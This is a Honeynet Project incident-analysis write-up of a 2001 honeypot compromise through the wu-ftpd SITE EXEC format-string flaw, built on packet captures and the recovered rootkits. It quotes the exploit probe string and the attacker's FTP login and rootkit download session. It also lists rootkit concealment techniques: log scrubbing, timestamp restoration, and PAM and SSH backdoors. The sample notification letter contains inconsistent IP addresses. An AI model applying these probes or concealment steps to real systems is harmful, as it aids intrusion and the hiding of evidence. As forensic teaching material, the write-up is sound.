Scan 19 Results

Analysis provided by Jerome Poggi, Hervé Schauer Consultants (HSC)
The Honeynet Project


The Challenge:
On September 16th a Redhat Linux 6.2 honeypot was compromised. This is the 3rd time this system was compromised by the same intruder. The honeynet is VMware based and uses a modified bash to log to syslog. Syslog is remotely logging to 0.0.0.0 (remote syslog server IP has been replaced). The compromised system has an IP of 192.168.1.102. After successfully breaking into the box, the attacker ended up using 3 modes of connecting and running commands (some of which is encrypted). The attacker also tried to hide some of his edits from the MAC times.

  1. Which vulnerability did the intruder exploit?
  2. What ways, and in what order, did the intruder use to connect and run commands on the system?
  3. How did the intruder try to hide his edits from the MAC times?
  4. The intruder downloaded rootkits, what were they called? Are they new/custom rootkits?
  5. Recover (tell how you did it too) the rootkits from the snort binary capture
  6. What does the rootkit do to hide the presence of the attacker on the system?
  7. What did you learn from this exercise?
  8. How long did this challenge take you?

Bonus Questions:
Based on this challenge, write an example letter of notification to the source owner that attacked the system. Include any evidence or logs that you feel important.

The Analysis: The first step is to download the file and confirm its MD5 checksum, which validates the integrity of the file. Then the analysis can begin.

$wget http://project.honeynet.org/scans/scan19/scan19.tar.gz
$md5 scan19.tar.gz
11e0be295d138df14111796a7733a5d2 scan19.tar.gz
$tar -zxvf scan19.tar.gz

Our data is intact, so we can begin to analyse it.
For convenience I use tcpflow to extract all data from newdat2.log; this gives one file per TCP stream (each pair of IP address and port on both hosts).
To get information on a TCP stream I use tethereal and ethereal.

1. Which vulnerability did the intruder exploit?
The intruder used a remote root exploit against the wu-ftpd SITE EXEC format string vulnerability. Advisories:

  1. CVE-2000-0573
  2. CERT/CC
  3. RedHat
The intruder sent the exploit in packets 411 (01:55:58.3725) and 414 (01:55:59.4857) and obtained a root shell at packet 415 (01:55:59.5296).

2. What ways, and in what order, did the intruder use to connect and run commands on the system?

  • After multiple attempts over NetBIOS, DNS, portmap and ISAKMP, the intruder used telnet to try to log on as nobody with the passwords "ultravirus" and "virus".
  • He also tried to open a connection on port 24 (the SSH backdoor he had left behind) and checked whether an IRC relay was present.
  • At 01:55:45.1987 he initiated the FTP connection, which he used to exploit the format string vulnerability of wu-ftpd 2.6.0(1).
    The program used here is 7350wu-v5.tar.gz. It can also be found in the file copy.tar.gz under the name zxploit.
  • The intruder blanked the password of the user nobody. He then saved the timestamps of /etc/passwd and /etc, because he added a user named dns with uid/gid 0/0. After the user was added, he put the old timestamps back on /etc/passwd and /etc.
  • He then connected directly to the machine with telnet, logged in as nobody and did su to dns, so he was identified in the logs as nobody.

3. How did the intruder try to hide his edits from the MAC times?

The intruder tried to hide his edits from the MAC times by saving the MAC times of /etc and /etc/passwd. The problem is that he did not save the MAC times of /etc/shadow. He used the directories /etc/X11/applnk/Internet/.etc and /etc/X11/applnk/Internet/.etcpasswd to save the MAC times, and he did not remove these two directories.
ls -lt /etc gives:

-r--------    1 root     root          678 Sep 16 04:40 shadow
-rw-------    1 root     root            5 Sep 16 04:40 group.lock
-rw-------    1 root     root            5 Sep 16 04:40 gshadow.lock
-rw-r--r--    1 root     root          728 Sep 16 04:40 passwd-
-r--------    1 root     root          667 Sep 16 04:40 shadow-
-rw-r--r--    1 root     root          728 Sep 16 04:31 passwd
We can date his attack exactly.
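The inconsistency the listing shows (passwd older than shadow and older than its own backup passwd-) can be checked mechanically. The following Python is an added example, not part of the original analysis: it parses an ls -l style listing (the constructed sample mirrors the one above; the year 2001 is assumed, since ls does not print it) and flags account-database files whose modification order does not match a normal useradd/passwd update, which rewrites these files together.

```python
from datetime import datetime

# Constructed listing, modelled on the `ls -lt /etc` output quoted above.
LISTING = """-r--------    1 root     root          678 Sep 16 04:40 shadow
-rw-------    1 root     root            5 Sep 16 04:40 group.lock
-rw-------    1 root     root            5 Sep 16 04:40 gshadow.lock
-rw-r--r--    1 root     root          728 Sep 16 04:40 passwd-
-r--------    1 root     root          667 Sep 16 04:40 shadow-
-rw-r--r--    1 root     root          728 Sep 16 04:31 passwd
"""


def parse_listing(text, year=2001):
    """Map file name -> mtime for `ls -l` lines that show an HH:MM time.
    The year is an assumption: ls omits it for recent files."""
    mtimes = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 9:
            continue
        mon, day, hhmm, name = parts[5], parts[6], parts[7], parts[8]
        if ":" not in hhmm:  # entries older than six months show a year instead
            continue
        mtimes[name] = datetime.strptime(f"{year} {mon} {day} {hhmm}",
                                         "%Y %b %d %H:%M")
    return mtimes


def timestamp_anomalies(mtimes):
    """useradd/passwd rewrite passwd, passwd-, shadow and shadow- in one
    operation, so passwd being older than any of them suggests its mtime
    was restored by hand after the edit."""
    findings = []
    p = mtimes.get("passwd")
    if p is None:
        return findings
    for other in ("passwd-", "shadow", "shadow-"):
        if other in mtimes and mtimes[other] > p:
            findings.append(f"{other} ({mtimes[other]:%H:%M}) is newer "
                            f"than passwd ({p:%H:%M})")
    return findings


if __name__ == "__main__":
    for finding in timestamp_anomalies(parse_listing(LISTING)):
        print(finding)
```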

4. The intruder downloaded rootkits, what were they called? Are they new/custom rootkits?

The intruder downloaded his rootkit to /dev/rd/scd0 from a host in Romania (ftp://teleport:gunoierul@teleport.go.ro).
He downloaded 3 files:

  • Zer0.tar.gz: a t0rnkit with adore, without all the trojaned binaries usually found in t0rnkit, and heavily modified by Viruzzel. The parts of t0rnkit used are the log cleaner and the installation of adore. The rootkit contains adore 0.39 (the latest adore release); it does not contain trojaned binaries like ls, ps, ifconfig...
  • copy.tar.gz contains some client programs: the smurf5 DDoS program, an ssh client (ssh), the exploit program (zxploit aka 7350wu-v5) and a wu-ftpd scanner (wu-scan).
  • ooty.tar.gz contains some local root exploits.
It is a rootkit assembled from several different rootkits, which he personalised.

5. Recover (tell how you did it too) the rootkits from the snort binary capture

To recover the rootkits I used tcpflow:

$ tcpflow -v -r newdat3.log port 20
tcpflow[22438]: tcpflow version 0.20 by Jeremy Elson 
tcpflow[22438]: looking for handler for datalink type 1 for interface newdat3.log
tcpflow[22438]: found max FDs to be 16 using OPEN_MAX
tcpflow[22438]: 193.231.236.042.00020-192.168.001.102.01026: new flow
tcpflow[22438]: 193.231.236.042.00020-192.168.001.102.01026: opening new output file
tcpflow[22438]: 193.231.236.042.00020-192.168.001.102.01027: new flow
tcpflow[22438]: 193.231.236.042.00020-192.168.001.102.01027: opening new output file
tcpflow[22438]: 193.231.236.042.00020-192.168.001.102.01028: new flow
tcpflow[22438]: 193.231.236.042.00020-192.168.001.102.01028: opening new output file
We now have 3 files, but we don't know their real names. The FTP control channel gives them:
$tcpflow -v -r newdat3.log dst port 21 and host 193.231.236.042
tcpflow[22546]: tcpflow version 0.20 by Jeremy Elson 
tcpflow[22546]: looking for handler for datalink type 1 for interface newdat3.log
tcpflow[22546]: found max FDs to be 16 using OPEN_MAX
tcpflow[22546]: 192.168.001.102.01025-193.231.236.042.00021: new flow
tcpflow[22546]: 192.168.001.102.01025-193.231.236.042.00021: opening new output file
$ cat 192.168.001.102.01025-193.231.236.042.00021
USER teleport
PASS gunoierul
SYST
CWD new
TYPE I
PORT 192,168,1,102,4,2
RETR Zer0.tar.gz
PORT 192,168,1,102,4,3
RETR copy.tar.gz
PORT 192,168,1,102,4,4
RETR ooty.tar.gz
QUIT
An FTP PORT argument h1,h2,h3,h4,p1,p2 advertises the client data port p1*256 + p2, so:
0x0402 = 1026, so 193.231.236.042.00020-192.168.001.102.01026 is Zer0.tar.gz
0x0403 = 1027, so 193.231.236.042.00020-192.168.001.102.01027 is copy.tar.gz
0x0404 = 1028, so 193.231.236.042.00020-192.168.001.102.01028 is ooty.tar.gz
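The mapping from PORT arguments to tcpflow output files can be automated. The Python below is an added example (it is neither from the original write-up nor part of tcpflow): it reads a constructed copy of the control-channel stream above (PASS line omitted), decodes each PORT command as h1,h2,h3,h4,p1,p2 with port = p1*256 + p2, and builds the tcpflow file name for the active-mode data connection, which the server opens from port 20 to the advertised client port.

```python
# Constructed FTP control-channel excerpt, modelled on the recovered stream.
CONTROL_STREAM = """USER teleport
SYST
CWD new
TYPE I
PORT 192,168,1,102,4,2
RETR Zer0.tar.gz
PORT 192,168,1,102,4,3
RETR copy.tar.gz
PORT 192,168,1,102,4,4
RETR ooty.tar.gz
QUIT
"""


def parse_port(arg):
    """Decode 'h1,h2,h3,h4,p1,p2' into (ip, port) with port = p1*256 + p2."""
    h1, h2, h3, h4, p1, p2 = (int(x) for x in arg.split(","))
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def tcpflow_name(src_ip, src_port, dst_ip, dst_port):
    """tcpflow names output files with zero-padded octets and 5-digit ports."""
    pad = lambda ip: ".".join(f"{int(o):03d}" for o in ip.split("."))
    return f"{pad(src_ip)}.{src_port:05d}-{pad(dst_ip)}.{dst_port:05d}"


def map_data_flows(control, server_ip, data_port=20):
    """Return {tcpflow file name: transferred file name} for each RETR/STOR
    that follows a PORT command in an active-mode session."""
    mapping = {}
    pending = None
    for line in control.splitlines():
        cmd, _, arg = line.strip().partition(" ")
        cmd = cmd.upper()
        if cmd == "PORT":
            pending = parse_port(arg)
        elif cmd in ("RETR", "STOR") and pending is not None:
            client_ip, client_port = pending
            # Active mode: server connects from port 20 to the client's port.
            mapping[tcpflow_name(server_ip, data_port,
                                 client_ip, client_port)] = arg
            pending = None  # each PORT serves exactly one transfer
    return mapping


if __name__ == "__main__":
    for flow, name in map_data_flows(CONTROL_STREAM, "193.231.236.42").items():
        print(f"{flow} is {name}")
```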

6. What does the rootkit do to hide the presence of the attacker on the system?

In the file 192.168.001.102.00023-217.156.093.166.61216 we can find the complete trace of what the intruder received while downloading and installing the rootkit.

  • It checks whether syslog messages are sent to another computer.
  • The rootkit saves the MAC times of /bin, /usr/X11R6/bin and /etc/rc.d/rc3.d.
  • It uses /usr/X11R6/bin/.,/copy/ to store the trojaned SSH (listening on port 24/tcp) and the zsh shell (here a copy of /bin/bash with permissions 7777).
  • It starts the script /dev/rd/nscd.init at boot (rc3.d) to hide all of his suspicious files with adore :)
  • It compiles adore, downloading make and/or gcc if needed.
  • It hides many directories and files (/usr/X11R6/bin/., /usr/info/.t0rn, /dev/rd/sdc0, /dev/rd/nscd.init, /etc/rc.d/rc3.d/S50inet, /usr/X11R6/lib/X11/.~).
  • It installs a login backdoor (vrssnk) that modifies PAM.
  • It cleans up its temporary files.
  • It cleans the /var/log files of lines containing the words login, ftp and dns.
  • It restores the MAC times of /bin, /usr/X11R6/bin and /etc/rc.d/rc3.d.

7. What did you learn from this exercise?

How to read tcpdump files correctly, and how an intruder really "works".

8. How long did this challenge take you?

It took me close to two days (cumulative time).

Bonus question: write an example letter of notification to the source owner that attacked the system. Include any evidence or logs that you feel important.

We assume that the IP of the compromised computer was 192.168.1.102, even though it is a private address.
Message to the administrator of the computer that had the IP 217.156.93.166:

I have a lot of information that leads me to think that your computer was compromised by a hacker and used to compromise my computer (IP: 192.160.1.102).
Here you can find some information, evidence and logs:

  • At 2001-09-17 01:55:45.1987 the intruder connected from 207.35.251.172 to our FTP server.
    229 2001-09-17 01:55:45.1987 207.35.251.172 -> 192.168.1.102 TCP 74 2243 > 21 [SYN] Seq=3480775092 Ack=0 Win=32120 Len=0
    230 2001-09-17 01:55:45.2016 192.168.1.102 -> 207.35.251.172 TCP 74 21 > 2243 [SYN, ACK] Seq=3956112893 Ack=3480775093 Win=32120 Len=0
    231 2001-09-17 01:55:45.2361 207.35.251.172 -> 192.168.1.102 TCP 66 2243 > 21 [ACK] Seq=3480775093 Ack=3956112894 Win=32120 Len=0
  • At 2001-09-17 01:55:52.5527 the intruder sent a large request to obtain a buffer overflow.
    245 2001-09-17 01:55:52.5527 207.35.251.172 -> 192.168.1.102 FTP 482 Request: SITE EXEC 7 mmmmnnnn%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f|%08x|%08x|
  • At 2001-09-17 01:55:59.4857 the intruder sent the root shell.
  • At 2001-09-17 01:56:01.4916 the intruder had confirmation that he was root.
    416 2001-09-17 01:56:01.4916 207.35.251.172 -> 192.168.1.102 FTP 70 Request: id;
    417 2001-09-17 01:56:01.5388 192.168.1.102 -> 207.35.251.172 TCP 66 21 > 2243 [ACK] Seq=3956149945 Ack=3480792757 Win=32120 Len=0
    418 2001-09-17 01:56:01.7424 192.168.1.102 -> 207.35.251.172 FTP 105 Response: uid=0(root) gid=0(root) groups=50(ftp)
    419 2001-09-17 01:56:01.8020 207.35.251.172 -> 192.168.1.102 TCP 66 2243 > 21 [ACK] Seq=3480792757 Ack=3956149984 Win=31856 Len=0
  • At 2001-09-17 02:12:54.4741 he changed the password of nobody.
  • At 2001-09-17 02:22:12.4272 he added the user dns without a password.
  • At 2001-09-17 02:44:48.7986 the intruder did a complete TCP port scan.
    Open ports:
    telnet     23/tcp (discovered at 02:44:54.2737)
    trojan   1024/tcp (discovered at 02:44:58.2773)
    ftp        21/tcp (discovered at 02:45:06.2565)
    who       513/udp (discovered at 02:45:15.5809)
    smtp       25/tcp (discovered at 02:45:17.6521)
    auth      113/tcp (discovered at 02:45:18.1396)
    linuxconf  98/tcp (discovered at 02:45:29.2826)
    rpc       111/tcp (discovered at 02:45:32.4353)
    printer   515/tcp (discovered at 02:45:38.8030)
    unknown   921/tcp (discovered at 02:45:41.8367)
    finger     79/tcp (discovered at 02:46:02.1268)
  • At 2001-09-17 02:56:12.4702 the intruder closed the connection.
    23392 2001-09-17 02:56:12.4702 207.35.251.172 -> 192.168.1.102 TCP 66 2243 > 21 [FIN, ACK] Seq=3480793419 Ack=3956202690 Win=31856 Len=0
    23393 2001-09-17 02:56:12.5182 192.168.1.102 -> 207.35.251.172 TCP 66 21 > 2243 [ACK] Seq=3956202690 Ack=3480793420 Win=32120 Len=0
    23394 2001-09-17 02:56:15.3943 192.168.1.102 -> 207.35.251.172 TCP 66 21 > 2243 [FIN, ACK] Seq=3956202690 Ack=3480793420 Win=32120 Len=0
    23395 2001-09-17 02:56:15.4731 207.35.251.172 -> 192.168.1.102 TCP 66 2243 > 21 [ACK] Seq=3480793420 Ack=3956202691 Win=31856 Len=0

  • Please reinstall your computer completely, and investigate to gather as much information as possible about how your computer was compromised.

    Sincerely.